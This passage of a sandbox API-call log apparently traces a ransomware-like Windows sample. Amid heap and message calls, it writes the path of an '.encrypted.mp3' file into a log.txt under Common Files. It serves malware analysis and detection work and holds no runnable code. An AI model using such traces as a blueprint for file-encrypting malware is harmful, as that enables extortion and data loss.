lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.389] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.389] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.389] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.389] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.390] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x217e, lpOverlapped=0x0) returned 1 [0037.390] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x217e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.390] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x7ab380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 64 [0037.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.391] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3f, lpOverlapped=0x0) returned 1 [0037.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.391] CloseHandle (hObject=0x128) returned 1 [0037.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.392] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.392] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.393] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.393] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.393] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.393] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.394] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.397] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.398] RtlAllocateHeap 